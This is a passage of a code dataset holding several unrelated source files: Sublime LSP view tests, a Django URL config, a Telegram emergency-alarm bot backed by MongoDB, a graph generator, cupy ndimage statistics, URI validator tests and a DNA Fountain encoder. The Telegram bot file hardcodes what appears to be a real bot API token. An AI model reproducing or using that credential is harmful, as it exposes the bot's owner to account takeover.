DiagnosticSeverity.Error,\n \"range\": {\n \"start\": {\n \"character\": 0,\n \"line\": 0\n },\n \"end\": {\n \"character\": 1,\n \"line\": 0\n }\n }\n } # type: Diagnostic\n self.view.run_command(\"append\", {\"characters\": \"a b c\\n\"})\n params = text_document_code_action_params(\n view=self.view,\n region=sublime.Region(0, 1),\n diagnostics=[diagnostic],\n only_kinds=[CodeActionKind.Refactor]\n )\n self.assertEqual(params[\"textDocument\"], {\"uri\": filename_to_uri(self.mock_file_name)})\n\n def test_format_diagnostic_for_html(self) -> None:\n diagnostic1 = {\n \"message\": \"oops\",\n \"severity\": DiagnosticSeverity.Error,\n # The relatedInformation is present here, but it's an empty list.\n # This should have the same behavior as having no relatedInformation present.\n \"relatedInformation\": [],\n \"range\": {\n \"start\": {\n \"character\": 0,\n \"line\": 0\n },\n \"end\": {\n \"character\": 5,\n \"line\": 0\n }\n }\n } # type: Diagnostic\n # Make the same diagnostic but without the relatedInformation\n diagnostic2 = deepcopy(diagnostic1)\n diagnostic2.pop(\"relatedInformation\")\n self.assertIn(\"relatedInformation\", diagnostic1)\n self.assertNotIn(\"relatedInformation\", diagnostic2)\n client_config = make_stdio_test_config()\n # They should result in the same minihtml.\n self.assertEqual(\n format_diagnostic_for_html(client_config, diagnostic1, \"/foo/bar\"),\n format_diagnostic_for_html(client_config, diagnostic2, \"/foo/bar\")\n )\n\n def test_escaped_newline_in_markdown(self) -> None:\n self.assertEqual(\n minihtml(self.view, {\"kind\": \"markdown\", \"value\": \"hello\\\\\\nworld\"}, FORMAT_MARKUP_CONTENT),\n \"

hello\\\\\\nworld

\"\n )\n\n def test_single_backslash_in_markdown(self) -> None:\n self.assertEqual(\n minihtml(self.view, {\"kind\": \"markdown\", \"value\": \"A\\\\B\"}, FORMAT_MARKUP_CONTENT),\n \"

A\\\\B

\"\n )\n","sub_path":"tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":18682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"62494517","text":"from django.conf.urls import patterns, include, url\n\nfrom opal.urls import urlpatterns as opatterns\nfrom mir import api\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns(\n '',\n url(r'^admin/', include(admin.site.urls)),\n url(\n r'^mir/incident/(?P[0-9]+)$',\n api.MirApi.as_view({\n 'get': 'retrieve'\n }),\n name=\"mir_api\"\n ),\n)\n\nurlpatterns += opatterns\n","sub_path":"mir/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"576471059","text":"import time\nfrom pymongo import MongoClient\nimport gridfs\nimport telebot\nfrom telebot import types\n\ntoken = '504695669:AAEJ_QdTIbkeBFLdRZ77f7quniZty7iAN0U'\nbot = telebot.TeleBot(token)\nalarms={}\nkeyboard = types.ReplyKeyboardMarkup(resize_keyboard=True)\nkeyboard.add(types.KeyboardButton(text=\"cancel\"))\nkeyboard.add(types.KeyboardButton(text=\"end\"))\nkeyboard.add(types.KeyboardButton(text=\"location\",request_location=True))\nkeyboard.add(types.KeyboardButton(text=\"alarm\"))\n\nclient = MongoClient()\ndb = client.alarms\nfs = gridfs.GridFS(db)\ndef download_files(old):\n\tnew={}\n\tnew.update({'location':old.pop('location')})\n\tif 'text' in old:\n\t\tnew.update({'text':\" \".join(old.pop('text'))})\n\tfor file_type in old:\n\t\tnew.update({file_type:[] })\n\t\tfor file_id in old[file_type]:\n\t\t\t\tfile_info = bot.get_file(file_id)\n\t\t\t\tdownloaded_file = bot.download_file(file_info.file_path)\n\t\t\t\tOid=fs.put(downloaded_file,filename=file_info.file_path.split('/')[-1])\n\t\t\t\tnew[file_type].append(Oid)\n\treturn new\n@bot.message_handler(commands=['start','help'])\ndef handle_commands(message):\n\t\talarmed=False\n\t\tif message.chat.id in alarms:\n\t\t\talarmed=True\n\n\t\tif message.text==\"/start\":\n\t\t\tbot.send_message(message.chat.id, \"Добро пожаловать /alarm - для вызова помощи!\",reply_markup=keyboard)\n\t\telif message.text==\"/help\":\n\t\t\tbot.send_message(message.chat.id, \"Управление кнопками\")\n\t\t\n\n\n@bot.message_handler(content_types=[\"text\"])\ndef text_messages(message): \n\t\talarmed=False\n\t\tif message.chat.id in alarms:\n\t\t\talarmed=True\n\t\tif message.text==\"alarm\":\n\t\t\t\tif not alarmed:\n\t\t\t\t\talarms.update({message.chat.id:{}})\n\t\t\t\t\tbot.send_message(message.chat.id, \"Расскажите,что случилось!\")\n\t\t\t\telse:\n\t\t\t\t\tbot.send_message(message.chat.id, \"Да,да, продолжайте!\")\n\n\t\telif message.text==\"cancel\":\n\t\t\tif alarmed:\n\t\t\t\talarms.pop(message.chat.id,None)\n\t\t\t\tbot.send_message(message.chat.id, \"Берегите себя!\")\n\n\t\telif message.text==\"end\":\n\t\t\tif alarmed:\n\n\t\t\t\tif \"location\" not in alarms[message.chat.id] :\n\t\t\t\t\tbot.send_message(message.chat.id, \"Нам необходима ваша позиция!\")\n\t\t\t\telse:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tdb.alarms.insert(download_files(alarms.pop(message.chat.id)))\n\t\t\t\t\texcept Exception as e:\n\t\t\t\t\t\tprint(e)\n\t\t\t\t\tbot.send_message(message.chat.id, \"Держитесь,к вам уже едут!!\")\n\t\t\t\t\t\n\t\t\t\t\t\n\t\telif alarmed:\n\t\t\tif \"text\" not in alarms[message.chat.id]:\n\t\t\t\talarms[message.chat.id].update({\"text\":[]})\n\t\t\talarms[message.chat.id]['text'].append(message.text)\n\t\t\t\n\n\n#@bot.message_handler(content_types=['document'])\n#def doc_messages(message):\n\t#if message.chat.id in alarms:\n\t\t\t#alarms[message.chat.id].update({\"document\":[]})\n\t#alarms[message.chat.id][\"document\"].append(message.document.file_id)\n\n\n\n@bot.message_handler(content_types=[\"voice\"])\ndef doc_messages(message):\n\tif message.chat.id in alarms:\n\t\tif \"voice\" not in alarms[message.chat.id]:\n\t\t\talarms[message.chat.id].update({\"voice\":[]})\n\t\talarms[message.chat.id][\"voice\"].append(message.voice.file_id)\n\n\n@bot.message_handler(content_types=['photo'])\ndef img_messages(message):\n\tif message.chat.id in alarms:\n\t\tif \"photo\" not in alarms[message.chat.id]:\n\t\t\talarms[message.chat.id].update({\"photo\":[]})\n\t\talarms[message.chat.id]['photo'].append(message.photo[-1].file_id)\n\n\n@bot.message_handler(content_types=[\"location\"])\ndef loc_messages(message): # Название функции не играет никакой роли, в принципе\n\tif message.chat.id in alarms and message.text!=\"alarm\" :\n\t\tif \"location\" not in alarms[message.chat.id]:\n\t\t\talarms[message.chat.id].update({\"location\":[]})\n\t\t\talarms[message.chat.id]['location'].append((message.location.latitude,message.location.longitude))\nif __name__ == '__main__':\n\t\ttry:\n\t\t\tbot.polling(none_stop=True)\n\t\texcept Exception as e:\n\t\t\twith open('c_crashlog.txt', 'w') as f:\n\t\t\t\tf.write(str(e))\n\t\t","sub_path":"client_bot.py","file_name":"client_bot.py","file_ext":"py","file_size_in_byte":3920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"475093537","text":"import random\n\nn = 150\n\ndag_matrix = [[0 for i in range(n)] for t in range(n)]\nodd_vertex = []\n\nedges = int(n * (n - 1) * 0.6)\n\nlos = 0\n\nwhile (edges != 0):\n for i in range(n):\n if (edges != 0 and i + 1 < n):\n dag_matrix[i][i+1] = 1\n #dag_matrix[i+1][i] = 1\n edges -= 1\n for i in range(n):\n for t in range(i+1, n):\n if (edges != 0):\n los = random.randint(0, 1)\n\n if (los == 1 and dag_matrix[i][t] == 0):\n dag_matrix[i][t] = los\n #dag_matrix[t][i] = los\n edges -= 1\n\n\n\n\ndane = open('file.txt', 'w')\ndane.write(str(n))\ndane.write(\"\\n\")\n\nfor i in range(n):\n for t in range(n):\n if(dag_matrix[i][t] == 1):\n dane.write(str(i + 1))\n dane.write(\" \")\n dane.write(str(t + 1))\n dane.write(\"\\n\")\n\ndane.close()\n\n\n\n\n","sub_path":"generatorGrafu.py","file_name":"generatorGrafu.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"343669567","text":"import warnings\n\nimport numpy\n\nimport cupy\nfrom cupy import core\nfrom cupy import _util\n\n\ndef label(input, structure=None, output=None):\n \"\"\"Labels features in an array.\n\n Args:\n input (cupy.ndarray): The input array.\n structure (array_like or None): A structuring element that defines\n feature connections. ```structure``` must be centersymmetric. If\n None, structure is automatically generated with a squared\n connectivity equal to one.\n output (cupy.ndarray, dtype or None): The array in which to place the\n output.\n Returns:\n label (cupy.ndarray): An integer array where each unique feature in\n ```input``` has a unique label in the array.\n\n num_features (int): Number of features found.\n\n .. warning::\n\n This function may synchronize the device.\n\n .. seealso:: :func:`scipy.ndimage.label`\n \"\"\"\n if not isinstance(input, cupy.ndarray):\n raise TypeError('input must be cupy.ndarray')\n if input.dtype.char in 'FD':\n raise TypeError('Complex type not supported')\n if structure is None:\n structure = _generate_binary_structure(input.ndim, 1)\n elif isinstance(structure, cupy.ndarray):\n structure = cupy.asnumpy(structure)\n structure = numpy.array(structure, dtype=bool)\n if structure.ndim != input.ndim:\n raise RuntimeError('structure and input must have equal rank')\n for i in structure.shape:\n if i != 3:\n raise ValueError('structure dimensions must be equal to 3')\n\n if isinstance(output, cupy.ndarray):\n if output.shape != input.shape:\n raise ValueError(\"output shape not correct\")\n caller_provided_output = True\n else:\n caller_provided_output = False\n if output is None:\n output = cupy.empty(input.shape, numpy.int32)\n else:\n output = cupy.empty(input.shape, output)\n\n if input.size == 0:\n # empty\n maxlabel = 0\n elif input.ndim == 0:\n # 0-dim array\n maxlabel = 0 if input.item() == 0 else 1\n output[...] = maxlabel\n else:\n if output.dtype != numpy.int32:\n y = cupy.empty(input.shape, numpy.int32)\n else:\n y = output\n maxlabel = _label(input, structure, y)\n if output.dtype != numpy.int32:\n output[...] = y[...]\n\n if caller_provided_output:\n return maxlabel\n else:\n return output, maxlabel\n\n\ndef _generate_binary_structure(rank, connectivity):\n if connectivity < 1:\n connectivity = 1\n if rank < 1:\n return numpy.array(True, dtype=bool)\n output = numpy.fabs(numpy.indices([3] * rank) - 1)\n output = numpy.add.reduce(output, 0)\n return output <= connectivity\n\n\ndef _label(x, structure, y):\n elems = numpy.where(structure != 0)\n vecs = [elems[dm] - 1 for dm in range(x.ndim)]\n offset = vecs[0]\n for dm in range(1, x.ndim):\n offset = offset * 3 + vecs[dm]\n indxs = numpy.where(offset < 0)[0]\n dirs = [[vecs[dm][dr] for dm in range(x.ndim)] for dr in indxs]\n dirs = cupy.array(dirs, dtype=numpy.int32)\n ndirs = indxs.shape[0]\n y_shape = cupy.array(y.shape, dtype=numpy.int32)\n count = cupy.zeros(2, dtype=numpy.int32)\n _kernel_init()(x, y)\n _kernel_connect()(y_shape, dirs, ndirs, x.ndim, y, size=y.size)\n _kernel_count()(y, count, size=y.size)\n maxlabel = int(count[0])\n labels = cupy.empty(maxlabel, dtype=numpy.int32)\n _kernel_labels()(y, count, labels, size=y.size)\n _kernel_finalize()(maxlabel, cupy.sort(labels), y, size=y.size)\n return maxlabel\n\n\ndef _kernel_init():\n return core.ElementwiseKernel(\n 'X x', 'Y y', 'if (x == 0) { y = -1; } else { y = i; }',\n 'cupyx_nd_label_init')\n\n\ndef _kernel_connect():\n return core.ElementwiseKernel(\n 'raw int32 shape, raw int32 dirs, int32 ndirs, int32 ndim',\n 'raw Y y',\n '''\n if (y[i] < 0) continue;\n for (int dr = 0; dr < ndirs; dr++) {\n int j = i;\n int rest = j;\n int stride = 1;\n int k = 0;\n for (int dm = ndim-1; dm >= 0; dm--) {\n int pos = rest % shape[dm] + dirs[dm + dr * ndim];\n if (pos < 0 || pos >= shape[dm]) {\n k = -1;\n break;\n }\n k += pos * stride;\n rest /= shape[dm];\n stride *= shape[dm];\n }\n if (k < 0) continue;\n if (y[k] < 0) continue;\n while (1) {\n while (j != y[j]) { j = y[j]; }\n while (k != y[k]) { k = y[k]; }\n if (j == k) break;\n if (j < k) {\n int old = atomicCAS( &y[k], k, j );\n if (old == k) break;\n k = old;\n }\n else {\n int old = atomicCAS( &y[j], j, k );\n if (old == j) break;\n j = old;\n }\n }\n }\n ''',\n 'cupyx_nd_label_connect')\n\n\ndef _kernel_count():\n return core.ElementwiseKernel(\n '', 'raw Y y, raw int32 count',\n '''\n if (y[i] < 0) continue;\n int j = i;\n while (j != y[j]) { j = y[j]; }\n if (j != i) y[i] = j;\n else atomicAdd(&count[0], 1);\n ''',\n 'cupyx_nd_label_count')\n\n\ndef _kernel_labels():\n return core.ElementwiseKernel(\n '', 'raw Y y, raw int32 count, raw int32 labels',\n '''\n if (y[i] != i) continue;\n int j = atomicAdd(&count[1], 1);\n labels[j] = i;\n ''',\n 'cupyx_nd_label_labels')\n\n\ndef _kernel_finalize():\n return core.ElementwiseKernel(\n 'int32 maxlabel', 'raw int32 labels, raw Y y',\n '''\n if (y[i] < 0) {\n y[i] = 0;\n continue;\n }\n int yi = y[i];\n int j_min = 0;\n int j_max = maxlabel - 1;\n int j = (j_min + j_max) / 2;\n while (j_min < j_max) {\n if (yi == labels[j]) break;\n if (yi < labels[j]) j_max = j - 1;\n else j_min = j + 1;\n j = (j_min + j_max) / 2;\n }\n y[i] = j + 1;\n ''',\n 'cupyx_nd_label_finalize')\n\n\n_ndimage_variance_kernel = core.ElementwiseKernel(\n 'T input, R labels, raw X index, uint64 size, raw float64 mean',\n 'raw float64 out',\n \"\"\"\n for (ptrdiff_t j = 0; j < size; j++) {\n if (labels == index[j]) {\n atomicAdd(&out[j], (input - mean[j]) * (input - mean[j]));\n break;\n }\n }\n \"\"\")\n\n\n_ndimage_sum_kernel = core.ElementwiseKernel(\n 'T input, R labels, raw X index, uint64 size',\n 'raw float64 out',\n \"\"\"\n for (ptrdiff_t j = 0; j < size; j++) {\n if (labels == index[j]) {\n atomicAdd(&out[j], input);\n break;\n }\n }\n \"\"\")\n\n\ndef _ndimage_sum_kernel_2(input, labels, index, sum_val, batch_size=4):\n for i in range(0, index.size, batch_size):\n matched = labels == index[i:i + batch_size].reshape(\n (-1,) + (1,) * input.ndim)\n sum_axes = tuple(range(1, 1 + input.ndim))\n sum_val[i:i + batch_size] = cupy.where(matched, input, 0).sum(\n axis=sum_axes)\n return sum_val\n\n\n_ndimage_mean_kernel = core.ElementwiseKernel(\n 'T input, R labels, raw X index, uint64 size',\n 'raw float64 out, raw uint64 count',\n \"\"\"\n for (ptrdiff_t j = 0; j < size; j++) {\n if (labels == index[j]) {\n atomicAdd(&out[j], input);\n atomicAdd(&count[j], 1);\n break;\n }\n }\n \"\"\")\n\n\ndef _ndimage_mean_kernel_2(input, labels, index, batch_size=4,\n return_count=False):\n sum_val = cupy.empty_like(index, dtype=cupy.float64)\n count = cupy.empty_like(index, dtype=cupy.uint64)\n for i in range(0, index.size, batch_size):\n matched = labels == index[i:i + batch_size].reshape(\n (-1,) + (1,) * input.ndim)\n mean_axes = tuple(range(1, 1 + input.ndim))\n count[i:i + batch_size] = matched.sum(axis=mean_axes)\n sum_val[i:i + batch_size] = cupy.where(matched, input, 0).sum(\n axis=mean_axes)\n if return_count:\n return sum_val / count, count\n return sum_val / count\n\n\ndef _mean_driver(input, labels, index, return_count=False, use_kern=False):\n if use_kern:\n return _ndimage_mean_kernel_2(input, labels, index,\n return_count=return_count)\n\n out = cupy.zeros_like(index, cupy.float64)\n count = cupy.zeros_like(index, dtype=cupy.uint64)\n sum, count = _ndimage_mean_kernel(input,\n labels, index, index.size, out, count)\n if return_count:\n return sum / count, count\n return sum / count\n\n\ndef variance(input, labels=None, index=None):\n \"\"\"Calculates the variance of the values of an n-D image array, optionally\n at specified sub-regions.\n\n Args:\n input (cupy.ndarray): Nd-image data to process.\n labels (cupy.ndarray or None): Labels defining sub-regions in `input`.\n If not None, must be same shape as `input`.\n index (cupy.ndarray or None): `labels` to include in output. If None\n (default), all values where `labels` is non-zero are used.\n\n Returns:\n variance (cupy.ndarray): Values of variance, for each sub-region if\n `labels` and `index` are specified.\n\n .. seealso:: :func:`scipy.ndimage.variance`\n \"\"\"\n if not isinstance(input, cupy.ndarray):\n raise TypeError('input must be cupy.ndarray')\n\n if input.dtype in (cupy.complex64, cupy.complex128):\n raise TypeError(\"cupyx.scipy.ndimage.variance doesn't support %{}\"\n \"\".format(input.dtype.type))\n\n use_kern = False\n # There is constraints on types because of atomicAdd() in CUDA.\n if input.dtype not in [cupy.int32, cupy.float16, cupy.float32,\n cupy.float64, cupy.uint32, cupy.uint64,\n cupy.ulonglong]:\n warnings.warn(\n 'Using the slower implmentation as '\n 'cupyx.scipy.ndimage.sum supports int32, float16, '\n 'float32, float64, uint32, uint64 as data types'\n 'for the fast implmentation', _util.PerformanceWarning)\n use_kern = True\n\n def calc_var_with_intermediate_float(input):\n vals_c = input - input.mean()\n count = vals_c.size\n # Does not use `ndarray.mean()` here to return the same results as\n # SciPy does, especially in case `input`'s dtype is float16.\n return cupy.square(vals_c).sum() / cupy.asanyarray(count).astype(float)\n\n if labels is None:\n return calc_var_with_intermediate_float(input)\n\n if not isinstance(labels, cupy.ndarray):\n raise TypeError('label must be cupy.ndarray')\n\n if index is None:\n return calc_var_with_intermediate_float(input[labels > 0])\n\n if cupy.isscalar(index):\n return calc_var_with_intermediate_float(input[labels == index])\n\n input, labels = cupy.broadcast_arrays(input, labels)\n\n if not isinstance(index, cupy.ndarray):\n if not isinstance(index, int):\n raise TypeError('index must be cupy.ndarray or a scalar int')\n else:\n return (input[labels == index]).var().astype(cupy.float64,\n copy=False)\n\n mean_val, count = _mean_driver(input, labels, index, True, use_kern)\n if use_kern:\n new_axis = (..., *(cupy.newaxis for _ in range(input.ndim)))\n return cupy.where(labels[None, ...] == index[new_axis],\n cupy.square(input - mean_val[new_axis]),\n 0).sum(tuple(range(1, input.ndim + 1))) / count\n out = cupy.zeros_like(index, dtype=cupy.float64)\n return _ndimage_variance_kernel(input, labels, index, index.size, mean_val,\n out) / count\n\n\ndef sum(input, labels=None, index=None):\n \"\"\"Calculates the sum of the values of an n-D image array, optionally\n at specified sub-regions.\n\n Args:\n input (cupy.ndarray): Nd-image data to process.\n labels (cupy.ndarray or None): Labels defining sub-regions in `input`.\n If not None, must be same shape as `input`.\n index (cupy.ndarray or None): `labels` to include in output. If None\n (default), all values where `labels` is non-zero are used.\n\n Returns:\n sum (cupy.ndarray): sum of values, for each sub-region if\n `labels` and `index` are specified.\n\n .. seealso:: :func:`scipy.ndimage.sum`\n \"\"\"\n if not isinstance(input, cupy.ndarray):\n raise TypeError('input must be cupy.ndarray')\n\n if input.dtype in (cupy.complex64, cupy.complex128):\n raise TypeError(\"cupyx.scipy.ndimage.sum doesnt support %{}\".format(\n input.dtype.type))\n\n use_kern = False\n # There is constraints on types because of atomicAdd() in CUDA.\n if input.dtype not in [cupy.int32, cupy.float16, cupy.float32,\n cupy.float64, cupy.uint32, cupy.uint64,\n cupy.ulonglong]:\n warnings.warn(\n 'Using the slower implmentation as '\n 'cupyx.scipy.ndimage.sum supports int32, float16, '\n 'float32, float64, uint32, uint64 as data types'\n 'for the fast implmentation', _util.PerformanceWarning)\n use_kern = True\n\n if labels is None:\n return input.sum()\n\n if not isinstance(labels, cupy.ndarray):\n raise TypeError('label must be cupy.ndarray')\n\n if index is None:\n return input[labels != 0].sum()\n\n input, labels = cupy.broadcast_arrays(input, labels)\n\n if not isinstance(index, cupy.ndarray):\n if not isinstance(index, int):\n raise TypeError('index must be cupy.ndarray or a scalar int')\n else:\n return (input[labels == index]).sum()\n\n if index.size == 0:\n return cupy.array([], dtype=cupy.int64)\n\n out = cupy.zeros_like(index, dtype=cupy.float64)\n\n # The following parameters for sum where determined using a Tesla P100.\n if (input.size >= 262144 and index.size <= 4) or use_kern:\n return _ndimage_sum_kernel_2(input, labels, index, out)\n return _ndimage_sum_kernel(input, labels, index, index.size, out)\n\n\ndef mean(input, labels=None, index=None):\n \"\"\"Calculates the mean of the values of an n-D image array, optionally\n at specified sub-regions.\n\n Args:\n input (cupy.ndarray): Nd-image data to process.\n labels (cupy.ndarray or None): Labels defining sub-regions in `input`.\n If not None, must be same shape as `input`.\n index (cupy.ndarray or None): `labels` to include in output. If None\n (default), all values where `labels` is non-zero are used.\n\n Returns:\n mean (cupy.ndarray): mean of values, for each sub-region if\n `labels` and `index` are specified.\n\n\n .. seealso:: :func:`scipy.ndimage.mean`\n \"\"\"\n if not isinstance(input, cupy.ndarray):\n raise TypeError('input must be cupy.ndarray')\n\n if input.dtype in (cupy.complex64, cupy.complex128):\n raise TypeError(\"cupyx.scipy.ndimage.mean doesnt support %{}\".format(\n input.dtype.type))\n\n use_kern = False\n # There is constraints on types because of atomicAdd() in CUDA.\n if input.dtype not in [cupy.int32, cupy.float16, cupy.float32,\n cupy.float64, cupy.uint32, cupy.uint64,\n cupy.ulonglong]:\n warnings.warn(\n 'Using the slower implmentation as '\n 'cupyx.scipy.ndimage.mean supports int32, float16, '\n 'float32, float64, uint32, uint64 as data types '\n 'for the fast implmentation', _util.PerformanceWarning)\n use_kern = True\n\n def calc_mean_with_intermediate_float(input):\n sum = input.sum()\n count = input.size\n # Does not use `ndarray.mean()` here to return the same results as\n # SciPy does, especially in case `input`'s dtype is float16.\n return sum / cupy.asanyarray(count).astype(float)\n\n if labels is None:\n return calc_mean_with_intermediate_float(input)\n\n if not isinstance(labels, cupy.ndarray):\n raise TypeError('label must be cupy.ndarray')\n\n if index is None:\n return calc_mean_with_intermediate_float(input[labels > 0])\n\n if cupy.isscalar(index):\n return calc_mean_with_intermediate_float(input[labels == index])\n\n input, labels = cupy.broadcast_arrays(input, labels)\n\n if not isinstance(index, cupy.ndarray):\n if not isinstance(index, int):\n raise TypeError('index must be cupy.ndarray or a scalar int')\n else:\n return (input[labels == index]).mean(dtype=cupy.float64)\n\n return _mean_driver(input, labels, index, use_kern=use_kern)\n\n\ndef standard_deviation(input, labels=None, index=None):\n \"\"\"Calculates the standard deviation of the values of an n-D image array,\n optionally at specified sub-regions.\n\n Args:\n input (cupy.ndarray): Nd-image data to process.\n labels (cupy.ndarray or None): Labels defining sub-regions in `input`.\n If not None, must be same shape as `input`.\n index (cupy.ndarray or None): `labels` to include in output. If None\n (default), all values where `labels` is non-zero are used.\n\n Returns:\n standard_deviation (cupy.ndarray): standard deviation of values, for\n each sub-region if `labels` and `index` are specified.\n\n .. seealso:: :func:`scipy.ndimage.standard_deviation`\n \"\"\"\n return cupy.sqrt(variance(input, labels, index))\n","sub_path":"cupyx/scipy/ndimage/measurements.py","file_name":"measurements.py","file_ext":"py","file_size_in_byte":17725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"156936972","text":"import pytest\n\nfrom gata.errors import ValidationError\nfrom gata.validators import validate_uri\n\n\n@pytest.mark.parametrize(\n \"value\",\n (\n \"http://foo.com/blah_blah\",\n \"http://foo.com/blah_blah/\",\n \"https://www.example.com/foo/?bar=baz&inga=42&quux\",\n \"http://userid:password@example.com\",\n \"http://142.42.1.1:8080/\",\n \"http://142.42.1.1/\",\n \"http://code.google.com/events/#&product=browser\",\n \"http://a.b-c.de\",\n \"https://foo_bar.example.com/\",\n \"http://jabber.tcp.gmail.com\",\n \"http://_jabber._tcp.gmail.com\",\n \"http://مثال.إختبار\",\n ),\n)\ndef test_validate_uri_valid_values(value: str):\n assert validate_uri(value)\n\n\n@pytest.mark.parametrize(\n \"value\",\n (\n \"aaaa\",\n \"...\",\n \"####/3s\"\n ),\n)\ndef test_validate_uri_invalid_values(value: str):\n with pytest.raises(ValidationError):\n validate_uri(value)\n","sub_path":"tests/validators/test_validate_uri.py","file_name":"test_validate_uri.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"195515670","text":"import struct\nimport random\nimport os\nimport numpy as np\nimport logging\nimport sys\nimport operator\nfrom reedsolo import RSCodec\nimport numpy as np\nimport scipy.interpolate as inter\nimport math\nimport pprint\nfrom Helper_Functions import *\nfrom RPNG import *\nimport csv\nfrom copy import deepcopy\nimport json\nprocess = 0\n\n\n# ----------------------------------------------------Droplet-------------------------------------------------#\nclass Droplet:\n def __init__(self, data, seed, num_chunks=None, rs=0, rs_obj=None, degree=None):\n # num_chunks is a list of the orignal packets numbers used to xor\n # rs is the number of Reed Solomon symbols to add to the message\n\n self.data = data\n self.seed = seed\n self.num_chunks = set(num_chunks)\n self.rs = rs\n self.rs_obj = rs_obj\n self.degree = degree\n\n self.DNA = None\n\n def toDNA(self, flag=None):\n # this function wraps the seed, data payload, and Reed Solomon.\n if self.DNA is not None:\n return self.DNA\n self.DNA = byte_to_dna(self._package())\n return self.DNA\n\n def chunkStr(self):\n num = 0\n s = ''\n for i in self.num_chunks:\n if (6 == num):\n s += '...'\n break\n s += str(i) + ' '\n num += 1\n return s\n\n def _package(self):\n # this function converts the seed to a list of 4bytes HARD CODED!!!\n # adds the seed to the data (list of integers)\n # computes a reed solomon on the seed+data.\n # returns everything.\n\n seed_ord = self.seed.to_bytes(4, byteorder='big')\n # converting the seed into exectly four bytes.\n message = seed_ord + bytes(self.data)\n\n if self.rs > 0:\n message = self.rs_obj.encode(message) # adding RS symbols to the message\n\n return message\n\n\n# ----------------------------------------------------Fountain-------------------------------------------------#\nclass DNAFountain:\n\n def __init__(self,\n file_in,\n alpha,\n stop=None,\n rs=0,\n c_dist=0.1,\n delta=0.5,\n scanner=None\n ):\n\n # alpha is the redundency level\n # stop is whether we have a limit on the number of oligos\n # chunk_size and file_size are in bytes\n # rs is the number of bytes for reed-solomon error correcting code over gf(2^8).\n # c_dist is a parameter of the degree distribution\n # delta is a parameter of the degree distribution\n # np: should we use numpy random number generator? Faster, but incompatible for previous versions\n # max_homopolymer: the largest homopolymer allowed\n # gc: the allowable range of gc +- 50%\n\n # data:\n self.file_in = file_in\n self.chunk_size = len(file_in[0])\n self.num_chunks = len(file_in)\n\n # reduancy:\n self.alpha = alpha\n self.stop = stop\n self.final = self.calc_stop()\n\n # random mnumber generator\n self.lfsr = lfsr(lfsr32s(), lfsr32p()) # starting an lfsr with a certain state and a polynomial for 32bits.\n self.lfsr_l = len('{0:b}'.format(lfsr32p())) - 1 # calculate the length of lsfr in bits\n self.seed = self.lfsr.__next__()\n\n self.PRNG = PRNG(K=self.num_chunks, delta=delta, c=c_dist, np=np) # creating the solition distribution object\n self.PRNG.set_seed(self.seed)\n\n # error correcting code:\n self.rs = rs # the number of symbols (bytes) to add\n self.rs_obj = RSCodec(self.rs) # initalizing an reed solomon object\n\n # biological screens:\n self.scanner = scanner\n if self.scanner == None:\n self.scanner = Scanner()\n\n self.tries = 0 # number of times we tried to create a droplet\n self.good = 0 # droplets that were screened successfully.\n\n self.oligo_l = self.calc_oligo_length()\n # store the generated droplets\n self.dna_df = None\n self.dna_dl = []\n\n def calc_oligo_length(self):\n # return the number of nucleotides in an oligo:\n bits = self.chunk_size * 8 + self.lfsr_l + self.rs * 8\n return bits / 4\n\n def calc_stop(self):\n if self.stop is not None:\n return self.stop\n stop = int(self.num_chunks * (1 + self.alpha)) + 1\n return stop\n\n def droplet(self):\n # creating a droplet.\n data = None\n\n d, num_chunks = self.rand_chunk_nums() # creating a random list of segments.\n\n for num in num_chunks: # iterating over each segment\n if data is None: # first round. data payload is empty.\n data = self.chunk(num) # just copy the segment to the payload.\n else: # more rounds. Xor the new segments with the payload.\n data = xor(data, self.chunk(num)) # map(operator.xor, data, self.chunk(num))\n\n self.tries += 1\n\n # we have a droplet:\n return Droplet(data=data,\n seed=self.seed,\n rs=self.rs,\n rs_obj=self.rs_obj,\n num_chunks=num_chunks,\n degree=d)\n\n def chunk(self, num):\n # return the num-th segment from the file\n return self.file_in[num]\n\n # -------------------generate random chunk numebers----------------#\n def updateSeed(self):\n # This function creates a fresh seed for the droplet and primes the solition inverse cdf sampler\n self.seed = self.lfsr.__next__() # deploy one round of lfsr, and read the register.\n self.PRNG.set_seed(self.seed) # update the seed with the register\n\n def rand_chunk_nums(self):\n # This funcation returns a subset of segments based on the solition distribution.\n # It updates the lfsr to generates a new seed.\n self.updateSeed() # get a fresh seed and prime the solition inverse cdf sampler.\n blockseed, d, ix_samples = self.PRNG.get_src_blocks_wrap()\n return d, ix_samples # return a list of segments.\n\n # ----------------screen generated droplets----------------------#\n def screen(self, droplet):\n if self.scanner.Pass(droplet.toDNA()):\n self.good += 1\n dna = droplet.toDNA()\n degree = droplet.degree\n chunk_str = droplet.chunkStr()\n self.dna_dl.append([dna, self.seed, degree, chunk_str])\n return 1\n return 0\n\n def save(self, file_name='encode_result.dna', ori_file_name=None):\n with open(file_name, 'w') as f:\n dic = {\n 'Encoding': 'DNA Fountain',\n 'Chunk Nums': self.num_chunks,\n 'Chunk Size': self.chunk_size,\n 'rs': self.rs\n }\n if ori_file_name != None:\n dic['file name'] = ori_file_name\n f.write(json.dumps(dic) + '\\n')\n f.writelines('\\n'.join([d[0] for d in self.dna_dl]))\n f.close()\n\n def encode(self, data):\n process = 0\n self.dl = []\n self.tries = 0\n self.good = 0\n while self.good < self.final:\n self.screen(self.droplet())\n if self.tries % 2000 == 0:\n logging.info(\"generate %d chunks after %d tries\", self.good, self.tries)\n if self.good % 10 == 0:\n process = int((self.good / self.final) * 100)\n print(process)\n logging.info(\"Finish generating %d chunks after %d tries\", self.good, self.tries)\n return self.dna_dl\n\n # ----------------------------------------------------Glass-------------------------------------------------#\n\n\nfrom collections import 